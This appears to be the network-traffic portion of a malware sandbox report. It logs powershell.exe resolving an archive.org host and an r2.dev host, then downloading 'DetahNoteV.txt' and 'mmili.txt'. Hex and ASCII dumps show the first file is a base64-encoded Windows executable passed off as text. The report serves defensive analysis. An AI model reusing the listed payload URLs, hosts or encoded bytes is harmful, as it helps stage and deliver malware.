                                            Oct 2, 2024 05:22:14.534238100 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.534327030 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.534482956 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.602472067 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.602566957 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.619529963 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619577885 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619611025 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619637012 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.619653940 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619668007 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619671106 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.619704008 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.619715929 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619749069 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619772911 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.619772911 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.619781971 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619792938 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619798899 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.619834900 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619856119 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.619863033 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619874001 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619910955 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619935989 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.619935989 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.619946957 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619959116 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.619991064 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620017052 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620017052 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620028019 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620038033 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620074034 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620076895 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620076895 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620086908 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620105982 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620125055 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620151997 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620181084 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620206118 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620206118 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620213032 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620223045 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620239973 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620251894 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620280981 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620287895 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620327950 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620328903 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620429993 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620456934 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620531082 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620531082 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.620575905 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.620992899 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.621121883 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.621213913 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.621263027 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.621294022 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.621386051 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.621387005 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.621413946 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.622045040 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.622376919 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.622386932 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.622454882 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.689124107 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.689282894 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.702368975 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.702425003 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.702481031 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.702502012 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.702521086 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.702574015 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.702815056 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.702833891 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.702879906 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.702892065 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.702924013 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.702924013 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.703183889 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.703200102 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.703249931 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.703257084 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.703352928 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.703412056 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.703447104 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.703495026 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.703500032 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.703520060 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.703952074 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.703974962 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.704014063 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.704021931 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.704045057 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.704260111 CEST44349705162.159.140.237192.168.2.8
                                            Oct 2, 2024 05:22:14.704313040 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.751410007 CEST49705443192.168.2.8162.159.140.237
                                            Oct 2, 2024 05:22:14.751435995 CEST44349705162.159.140.237192.168.2.8
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 2, 2024 05:22:09.749839067 CEST5652253192.168.2.81.1.1.1
                                            Oct 2, 2024 05:22:09.757000923 CEST53565221.1.1.1192.168.2.8
                                            Oct 2, 2024 05:22:13.088653088 CEST6078853192.168.2.81.1.1.1
                                            Oct 2, 2024 05:22:13.096730947 CEST53607881.1.1.1192.168.2.8
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 2, 2024 05:22:09.749839067 CEST192.168.2.81.1.1.10xe3dbStandard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                                            Oct 2, 2024 05:22:13.088653088 CEST192.168.2.81.1.1.10xddf1Standard query (0)pub-26ee9be236b54d0cb1b570a203543b93.r2.devA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Oct 2, 2024 05:22:09.757000923 CEST1.1.1.1192.168.2.80xe3dbNo error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                                            Oct 2, 2024 05:22:13.096730947 CEST1.1.1.1192.168.2.80xddf1No error (0)pub-26ee9be236b54d0cb1b570a203543b93.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                                            Oct 2, 2024 05:22:13.096730947 CEST1.1.1.1192.168.2.80xddf1No error (0)pub-26ee9be236b54d0cb1b570a203543b93.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                                            • ia600100.us.archive.org
                                            • pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.849704207.241.227.2404433776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-02 03:22:10 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                            Host: ia600100.us.archive.org
                                            Connection: Keep-Alive
                                            2024-10-02 03:22:10 UTC606INHTTP/1.1 200 OK
                                            Server: nginx/1.24.0 (Ubuntu)
                                            Date: Wed, 02 Oct 2024 03:22:10 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Content-Length: 2823512
                                            Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                            Connection: close
                                            ETag: "66e22cba-2b1558"
                                            Strict-Transport-Security: max-age=15724800
                                            Expires: Wed, 02 Oct 2024 09:22:10 GMT
                                            Cache-Control: max-age=21600
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                            Access-Control-Allow-Credentials: true
                                            Accept-Ranges: bytes
                                            2024-10-02 03:22:10 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                            Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                            2024-10-02 03:22:10 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                            Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                            2024-10-02 03:22:10 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                            Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                            2024-10-02 03:22:10 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                            Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                            2024-10-02 03:22:10 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                            Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                            2024-10-02 03:22:10 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                            Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                            2024-10-02 03:22:10 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                            Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                            2024-10-02 03:22:10 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                            Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                            2024-10-02 03:22:10 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                            Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                            2024-10-02 03:22:10 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                            Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.849705162.159.140.2374433776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-02 03:22:13 UTC102OUTGET /mmili.txt HTTP/1.1
                                            Host: pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
                                            Connection: Keep-Alive
                                            2024-10-02 03:22:14 UTC285INHTTP/1.1 200 OK
                                            Date: Wed, 02 Oct 2024 03:22:14 GMT
                                            Content-Type: text/plain
                                            Content-Length: 327680
                                            Connection: close
                                            Accept-Ranges: bytes
                                            ETag: "212bd8b6f43f2ddb04096efd4b03a531"
                                            Last-Modified: Wed, 18 Sep 2024 05:52:50 GMT
                                            Server: cloudflare
                                            CF-RAY: 8cc1911b4b120ca9-EWR
